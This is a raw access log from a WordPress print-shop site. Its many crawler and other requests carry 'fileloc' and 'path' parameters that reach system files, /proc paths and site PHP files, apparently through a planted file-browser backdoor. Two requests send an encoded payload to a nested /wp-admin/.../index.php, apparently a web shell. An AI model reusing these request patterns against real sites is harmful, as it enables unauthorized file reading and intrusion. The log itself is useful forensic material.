44.208.223.68 - - [25/Oct/2025:12:23:14 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/gconv/IBM857.so&path=//lib64/gconv HTTP/1.1" 200 28137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:15 +0000] "GET /my-account/?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fupdraft%2Fuploads-old%2Fjs_composer HTTP/2.0" 200 2615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:15 +0000] "GET /products/34905680.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-activate.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:15 +0000] "GET /?fileloc=//proc/2/task/2/root/proc/2/cwd/var/softaculous/eventsch/edit.php&path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/eventsch HTTP/2.0" 200 5497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:23:15 +0000] "GET /products/34905712.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:15 +0000] "GET /products/47888576.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:16 +0000] "GET /products/45626384.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:16 +0000] "GET /products/21155392.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:16 +0000] "GET /products/39545632.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:17 +0000] "GET /products/17402256.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:17 +0000] "GET /products/45639312.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:17 +0000] "GET /products/47895200.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-activate.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:18 +0000] "GET /products/11886992.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:18 +0000] "GET /products/39540848.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:18 +0000] "GET /products/11880672.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-bccvate.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 4468 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:18 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/eventsch/php82 HTTP/2.0" 200 2721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.209.187.99 - - [25/Oct/2025:12:23:18 +0000] "GET /?path=//usr/share/doc/platform-python-setuptools HTTP/1.1" 200 34525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:18 +0000] "GET /products/34903200.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-links-opml.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 200 3326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
162.128.159.36 - - [25/Oct/2025:12:23:19 +0000] "GET /product-category/t-shirt/page/1/?fileloc=/home/rockyroadprintin/public_html/wp-includes/session.php&path=/home/rockyroadprintin/public_html/wp-includes HTTP/2.0" 500 1149 "https://www.rockyroadprinting.net/product-category/t-shirt/page/1/?fileloc=/home/rockyroadprintin/public_html/wp-includes/session.php&path=/home/rockyroadprintin/public_html/wp-includes" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:19 +0000] "GET /products/17399888.html?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-blog-header.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:19 +0000] "GET /my-account/?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpullquote%2Fstyle-rtl.min.css&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fblocks%2Fpullquote HTTP/2.0" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:31 +0000] "GET /index.php/screen-printing/doc/TSS_block_diagram.png?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fplugins.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html HTTP/2.0" 500 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:31 +0000] "GET /index.php/screen-printing/art-requirements?fileloc=%2F%2Flib%2Fpython3.6%2Fsite-packages%2Fpip%2F_vendor%2Furllib3%2Fcontrib%2F_securetransport%2Fbindings.py&path=%2F%2Flib%2Fpython3.6%2Fsite-packages%2Fpip%2F_vendor%2Furllib3%2Fcontrib%2F_securetransport HTTP/2.0" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.219.80.71 - - [25/Oct/2025:12:23:31 +0000] "GET /?fileloc=//usr/bin/dbus-daemon&path=//usr/bin HTTP/1.1" 500 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.136 - - [25/Oct/2025:12:23:21 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/eventsch/php53 HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.80.130.239 - - [25/Oct/2025:12:23:31 +0000] "GET /?path=//usr/share/dbus-1 HTTP/1.1" 500 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:31 +0000] "GET /index.php/screen-printing/.github/logo.png?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fclass.wp-scripts.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes HTTP/2.0" 500 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.130 - - [25/Oct/2025:12:23:31 +0000] "GET /mathematics/quietly116/yk92k-26199 HTTP/1.1" 200 24130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
23.21.119.232 - - [25/Oct/2025:12:23:31 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//etc/cron.daily/logrotate&path=//etc/cron.daily HTTP/1.1" 500 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:31 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Felementor-pro%2Fmodules%2Fwoocommerce%2Ftraits HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:31 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/akaunting/php53 HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
47.128.45.154 - - [25/Oct/2025:12:23:31 +0000] "GET /?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes%2Fclass-wp-hook.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-includes HTTP/2.0" 500 1222 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.73.216.191 - - [25/Oct/2025:12:23:32 +0000] "GET /index.php/screen-printing/art-requirements?fileloc=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fupdraft%2Fplugins-old%2Fwoocommerce%2Fincludes%2Ftraits%2F.htaccess&path=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fupdraft%2Fplugins-old%2Fwoocommerce%2Fincludes%2Ftraits HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
184.154.14.66 - - [25/Oct/2025:12:18:32 +0000] "GET /wp-admin/css/colors/ocean/ocean/index.php?ARRAY=7o2230223n313736313339383331322p2231223n22687474703n5p2s5p2s7n7336313276313361732r636p6s77652r6172745p2s3s6p633q7068705s636s64655s6n6326743q313736313339343731322q6263653837306232316531373161663237323734663932656662353962656366222p2232223n226366316335656161353133653330303731613361613538336136613135323331222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33392q35342q37302q37322q38312q3238227q HTTP/1.1" 500 3334 "-" "-"
66.249.79.129 - - [25/Oct/2025:12:23:32 +0000] "GET /m57911693432 HTTP/1.1" 200 25110 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.191 - - [25/Oct/2025:12:23:32 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Felementor%2Fdata%2Fv2%2Fbase%2Fendpoint%2Findex HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:32 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Felementor-pro%2Fmodules%2Ftheme-elements%2Fassets HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:33 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Felementor-pro%2Fmodules%2Fforms%2Fsubmissions HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:33 +0000] "GET /index.php/screen-printing/art-requirements?fileloc=%2F%2Flib64%2Fpython3.6%2Fsite-packages%2Flxml%2Fdoctestcompare.py&path=%2F%2Flib64%2Fpython3.6%2Fsite-packages%2Flxml HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.129 - - [25/Oct/2025:12:23:33 +0000] "GET /m55446974981 HTTP/1.1" 200 26233 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.191 - - [25/Oct/2025:12:23:34 +0000] "GET /index.php/screen-printing/art-requirements?fileloc=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fupdraft%2Fplugins-old%2Fwordpress-seo%2Finc%2Fwpseo-functions.php&path=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fupdraft%2Fplugins-old%2Fwordpress-seo%2Finc HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:34 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fclient%2Fblocks%2Fmini-cart HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.215.231.15 - - [25/Oct/2025:12:23:34 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/python3.6/pprint.py&path=//lib64/python3.6 HTTP/1.1" 500 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:35 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Felementor-pro%2Fcore%2Fbehaviors HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:35 +0000] "GET /index.php/screen-printing/art-requirements?fileloc=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fcss%2Ftwenty-nineteen-rtl.css&path=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fcss HTTP/2.0" 500 1222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:23:19 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fusr%2Flib64%2Fpython2.7%2FDemo%2Ftkinter%2Fmatt%2Fdialog-box.py&path=%2F%2Fusr%2Flib64%2Fpython2.7%2FDemo%2Ftkinter%2Fmatt HTTP/2.0" 500 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.4.213.199 - - [25/Oct/2025:12:23:38 +0000] "GET /screen-printing-minimum-orders-bulk-benefits/?fileloc=//bin/ssh-agent&path=//bin HTTP/1.1" 200 494090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:40 +0000] "GET /index.php/screen-printing/art-requirements?fileloc=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fcss%2Fprivacy-rtl.css&path=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fcss HTTP/2.0" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:23:41 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/cmsimple/php81 HTTP/2.0" 200 2717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.129 - - [25/Oct/2025:12:23:41 +0000] "GET /guideline/counsel264/bc3db-1557/ HTTP/1.1" 200 24248 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
34.227.234.246 - - [25/Oct/2025:12:23:42 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//etc/iproute2/group&path=//etc/iproute2 HTTP/1.1" 200 12313 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:45 +0000] "GET /index.php/screen-printing/art-requirements?fileloc=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fupdraft%2Fuploads-old%2Fmailpoet%2Findex.php&path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fupdraft%2Fuploads-old%2Fmailpoet HTTP/2.0" 200 2322 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.212.86.97 - - [25/Oct/2025:12:23:46 +0000] "GET /?path=//usr/share/doc/perl-parent HTTP/1.1" 200 14251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.129 - - [25/Oct/2025:12:23:49 +0000] "GET /institution/root28/6dhjr-41599 HTTP/1.1" 200 24237 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
114.119.139.166 - - [25/Oct/2025:12:23:50 +0000] "GET /wolf/gentleman161/6wybr-32214/ HTTP/1.1" 200 81419 "https://www.rockyroadprinting.net/sitemap444.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.191 - - [25/Oct/2025:12:23:50 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Felementor-pro%2Fmodules%2Fshare-buttons%2Fassets HTTP/2.0" 200 2631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.232.82.72 - - [25/Oct/2025:12:23:50 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/python2.7/shutil.pyc&path=//lib64/python2.7 HTTP/1.1" 200 32914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
184.154.14.66 - - [25/Oct/2025:12:18:52 +0000] "GET /wp-admin/css/colors/ocean/ocean/index.php?ARRAY=7o2230223n313736313339383333322p2231223n22687474703n5p2s5p2s7n7336313276313361732r636p6s77652r6172745p2s3s6p633q7068705s636s64655s6n6326743q313736313339343733322q3436383463353336326236383431626365646334313536336638656162643661222p2232223n226366316335656161353133653330303731613361613538336136613135323331222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33392q35342q37302q37322q38312q3238227q HTTP/1.1" 504 16384 "-" "-"
54.197.178.107 - - [25/Oct/2025:12:23:54 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/aspell-0.60/cp1258.cset&path=//lib64/aspell-0.60 HTTP/1.1" 200 26546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:23:55 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fclient%2Fblocks%2Fproduct-meta HTTP/2.0" 200 2683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.129 - - [25/Oct/2025:12:23:55 +0000] "GET /faculty/racial53/dkzqy-27284/ HTTP/1.1" 200 24152 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
3.210.223.61 - - [25/Oct/2025:12:23:58 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/python2.7/cgitb.py&path=//lib64/python2.7 HTTP/1.1" 200 26591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:24:00 +0000] "GET /index.php/screen-printing/art-requirements?path=%2F%2Fproc%2F2%2Fcwd%2Fusr%2Fshare%2Fdoc%2Fcpanel-php84-net-url2%2Fdocs HTTP/2.0" 200 2683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.130 - - [25/Oct/2025:12:24:01 +0000] "GET /wisdom/profound82/umuyo-22043/ HTTP/1.1" 200 24265 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
3.217.171.106 - - [25/Oct/2025:12:24:02 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//var/lib/rpm/Transfiletriggername&path=//var/lib/rpm HTTP/1.1" 200 20670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:24:05 +0000] "GET /index.php/screen-printing/art-requirements?fileloc=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fcss%2FprettyPhoto-rtl.css&path=%2Fhome%2Frockyroadprintin%2Fwww%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fcss HTTP/2.0" 200 4108 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
100.29.34.97 - - [25/Oct/2025:12:24:06 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/aspell-0.60/nroff.amf&path=//lib64/aspell-0.60 HTTP/1.1" 200 12460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
165.22.187.243 - - [25/Oct/2025:12:24:07 +0000] "GET /2016/01/22/strategic-and-commercial-approach-with-technical-understanding/?fileloc=/home/rockyroadprintin/public_html/license.txt&path=/home/rockyroadprintin/public_html HTTP/1.1" 200 32474 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
66.249.79.129 - - [25/Oct/2025:12:24:07 +0000] "GET /comfort/Spanish102/wcsfe-40461/ HTTP/1.1" 200 24430 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
20.171.207.136 - - [25/Oct/2025:12:24:09 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/eventsch/php56 HTTP/2.0" 200 2720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:24:10 +0000] "GET /index.php/screen-printing/art-requirements?path=%2Fhome%2Frockyroadprintin%2Fpublic_html%2Fwp-content%2Fplugins%2Fwoocommerce%2Fassets%2Fclient%2Fblocks%2Fall-reviews HTTP/2.0" 200 2681 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
